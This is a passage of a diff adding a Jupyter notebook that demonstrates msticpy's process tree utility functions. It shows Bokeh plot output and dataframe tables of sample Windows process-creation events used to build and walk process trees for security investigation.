\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1738\"},\"title\":\"CommandLine\"},\"id\":\"1715\",\"type\":\"TableColumn\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1595\"},\"glyph\":{\"id\":\"1630\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1632\"},\"nonselection_glyph\":{\"id\":\"1631\"},\"view\":{\"id\":\"1634\"}},\"id\":\"1633\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"range\":{\"id\":\"1603\"},\"value\":0.25},\"id\":\"1652\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1664\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"1607\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1731\",\"type\":\"StringEditor\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1595\"},\"glyph\":{\"id\":\"1638\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1640\"},\"nonselection_glyph\":{\"id\":\"1639\"},\"view\":{\"id\":\"1642\"}},\"id\":\"1641\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"axis\":{\"id\":\"1613\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":\"navy\",\"group\":null,\"ticker\":null,\"visible\":false},\"id\":\"1616\",\"type\":\"Grid\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7,8]},\"id\":\"1661\",\"type\":\"FixedTicker\"},{\"attributes\":{\"editor\":{\"id\":\"1747\"},\"field\":\"Rarity\",\"formatter\":{\"id\":\"1746\"},\"title\":\"Rarity\"},\"id\":\"1719\",\"type\":\"TableColumn\"},{\"attributes\":{\"range\":{\"id\":\"1603\"},\"value\":0.25},\"id\":\"1644\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1745\",\"type\":\"StringEditor\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1596\"}},\"height\":{\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1628\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1630\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1614\",\"type\":\"BasicTicker\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1595\"},\"glyph\":{\"id\":\"1646\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1648\"},\"nonselection_glyph\":{\"id\":\"1647\"},\"view\":{\"id\":\"1650\"}},\"id\":\"1649\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"editor\":{\"id\":\"1741\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1740\"},\"title\":\"ProcessId\"},\"id\":\"1716\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1746\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1595\"}},\"id\":\"1722\",\"type\":\"CDSView\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"1754\"},\"group\":null,\"major_label_policy\":{\"id\":\"1755\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1659\"},\"visible\":false},\"id\":\"1609\",\"type\":\"LinearAxis\"},{\"attributes\":{\"below\":[{\"id\":\"1672\"}],\"center\":[{\"id\":\"1675\"},{\"id\":\"1679\"}],\"height\":700,\"left\":[{\"id\":\"1676\"}],\"renderers\":[{\"id\":\"1699\"}],\"title\":{\"id\":\"1725\"},\"toolbar\":{\"id\":\"1687\"},\"toolbar_location\":null,\"width\":90,\"x_range\":{\"id\":\"1664\"},\"x_scale\":{\"id\":\"1668\"},\"y_range\":{\"id\":\"1666\"},\"y_scale\":{\"id\":\"1670\"}},\"id\":\"1663\",\"subtype\":\"Figure\",\"type\":\"Plot\"}],\"root_ids\":[\"1723\"]},\"title\":\"Bokeh Application\",\"version\":\"2.4.2\"}};\n  const render_items = [{\"docid\":\"e6b7ba57-61a3-430c-a452-62fd60212899\",\"root_ids\":[\"1723\"],\"roots\":{\"1723\":\"3037c35d-8d35-4f2f-8503-02ea6630ad3a\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    let attempts = 0;\n    const timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1723"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/plain": [
+       "(Figure(id='1598', ...), Column(id='1723', ...))"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "svcs_tree = ptree.get_descendents(proc_rarity_tree, prar_roots.iloc[22])\n",
+    "ptree.plot_process_tree(svcs_tree, legend_col=\"Rarity\", show_table=True)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Process Tree utility functions\n",
+    "\n",
+    "The `process_tree_utils` module has a number of functions that may be useful in extracting or manipulating process trees or tree relationships.\n",
+    "\n",
+    "### Functions\n",
+    "- build_process_key\n",
+    "- build_process_tree\n",
+    "- get_ancestors\n",
+    "- get_children\n",
+    "- get_descendents\n",
+    "- get_parent\n",
+    "- get_process\n",
+    "- get_process_key\n",
+    "- get_root\n",
+    "- get_root_tree\n",
+    "- get_roots\n",
+    "- get_siblings\n",
+    "- get_summary_info\n",
+    "- get_tree_depth\n",
+    "- infer_schema"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### get_summary_info\n",
+    "Get summary information."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:46.996996Z",
+     "start_time": "2020-08-25T15:53:46.968996Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'Processes': 1010,\n",
+       " 'RootProcesses': 10,\n",
+       " 'LeafProcesses': 815,\n",
+       " 'BranchProcesses': 185,\n",
+       " 'IsolatedProcesses': 0,\n",
+       " 'LargestTreeDepth': 7}"
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ptree.get_summary_info(p_tree_win)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### get_roots\n",
+    "Get roots of all trees in the data set."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:47.044995Z",
+     "start_time": "2020-08-25T15:53:46.999997Z"
+    },
+    "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+    "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)",
+    "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6"
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>source_index_par</th>\n",
+       "      <th>ProcessId_par</th>\n",
+       "      <th>NewProcessName_par</th>\n",
+       "      <th>timestamp_orig_par</th>\n",
+       "      <th>parent_key</th>\n",
+       "      <th>IsRoot</th>\n",
+       "      <th>IsLeaf</th>\n",
+       "      <th>IsBranch</th>\n",
+       "      <th>path</th>\n",
+       "      <th>parent_index</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_key</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\svchost.exe|0x270|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x270</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1000</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x798|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x798</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1001</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0xb3c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1002</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\services.exe|0x220|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x220</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1003</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x864</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1004</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 35 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                   TenantId Account EventID  \\\n",
+       "proc_key                                                                      \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...      NaN     NaN    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...      NaN     NaN    4688   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...      NaN     NaN    4688   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...      NaN     NaN    4688   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...      NaN     NaN    4688   \n",
+       "\n",
+       "                                                               TimeGenerated  \\\n",
+       "proc_key                                                                       \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00+00:00   \n",
+       "\n",
+       "                                                           Computer  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...  MSTICAlertsWin1   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \n",
+       "\n",
+       "                                                   SubjectUserSid  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...            NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...            NaN   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...            NaN   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...            NaN   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...            NaN   \n",
+       "\n",
+       "                                                   SubjectUserName  \\\n",
+       "proc_key                                                             \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...             NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...             NaN   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...             NaN   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...             NaN   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...             NaN   \n",
+       "\n",
+       "                                                   SubjectDomainName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...               NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...               NaN   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...               NaN   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...               NaN   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...               NaN   \n",
+       "\n",
+       "                                                   SubjectLogonId  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...          0x3e7   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...          0x3e7   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...          0x3e7   \n",
+       "\n",
+       "                                                   NewProcessId  ...  \\\n",
+       "proc_key                                                         ...   \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...        0x270  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...        0x798  ...   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...        0xb3c  ...   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...        0x220  ...   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...        0x864  ...   \n",
+       "\n",
+       "                                                   source_index_par  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...              NaN   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...              NaN   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...              NaN   \n",
+       "\n",
+       "                                                   ProcessId_par  \\\n",
+       "proc_key                                                           \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...           NaN   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...           NaN   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...           NaN   \n",
+       "\n",
+       "                                                   NewProcessName_par  \\\n",
+       "proc_key                                                                \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...                NaN   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...                NaN   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...                NaN   \n",
+       "\n",
+       "                                                   timestamp_orig_par  \\\n",
+       "proc_key                                                                \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...                NaT   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaT   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...                NaT   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...                NaT   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...                NaT   \n",
+       "\n",
+       "                                                   parent_key IsRoot IsLeaf  \\\n",
+       "proc_key                                                                      \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...        NaN   True  False   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...        NaN   True  False   \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...        NaN   True  False   \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...        NaN   True  False   \n",
+       "c:\\program files\\microsoft monitoring agent\\age...        NaN   True  False   \n",
+       "\n",
+       "                                                   IsBranch  path parent_index  \n",
+       "proc_key                                                                        \n",
+       "c:\\windows\\system32\\svchost.exe|0x270|1970-01-0...    False  1000          NaN  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    False  1001          NaN  \n",
+       "c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-0...    False  1002          NaN  \n",
+       "c:\\windows\\system32\\services.exe|0x220|1970-01-...    False  1003          NaN  \n",
+       "c:\\program files\\microsoft monitoring agent\\age...    False  1004          NaN  \n",
+       "\n",
+       "[5 rows x 35 columns]"
+      ]
+     },
+     "execution_count": 11,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Get roots of all trees in the set\n",
+    "ptree.get_roots(p_tree_win).head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### get_descendents\n",
+    "Get the full tree beneath a process."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>source_index_par</th>\n",
+       "      <th>ProcessId_par</th>\n",
+       "      <th>NewProcessName_par</th>\n",
+       "      <th>timestamp_orig_par</th>\n",
+       "      <th>parent_key</th>\n",
+       "      <th>IsRoot</th>\n",
+       "      <th>IsLeaf</th>\n",
+       "      <th>IsBranch</th>\n",
+       "      <th>path</th>\n",
+       "      <th>parent_index</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_key</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\wbem\\wmiprvse.exe|0xda4|2019-02-09 20:04:38.017000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 20:04:38.017000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0xda4</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windows\\system32\\svchost.exe|0x270|1970-01-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1000/0</td>\n",
+       "      <td>1000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 20:05:31.010000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 20:05:31.010000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x14ec</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1001/1</td>\n",
+       "      <td>1001</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\conhost.exe|0x48c|2019-02-09 20:05:31.020000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 20:05:31.020000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x48c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>889.0</td>\n",
+       "      <td>0x798</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>2019-02-09 20:05:31.010000+00:00</td>\n",
+       "      <td>c:\\windows\\system32\\cmd.exe|0x14ec|2019-02-09 ...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1001/1/2</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\program files (x86)\\google\\update\\googleupdate.exe|0x16fc|2019-02-09 20:28:02.213000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 20:28:02.213000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x16fc</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windows\\system32\\svchost.exe|0xb3c|1970-01-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1002/3</td>\n",
+       "      <td>1002</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\program files (x86)\\google\\update\\googleupdate.exe|0x1c50|2019-02-09 20:28:56.763000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 20:28:56.763000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x1c50</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windows\\system32\\services.exe|0x220|1970-01...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1003/4</td>\n",
+       "      <td>1003</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
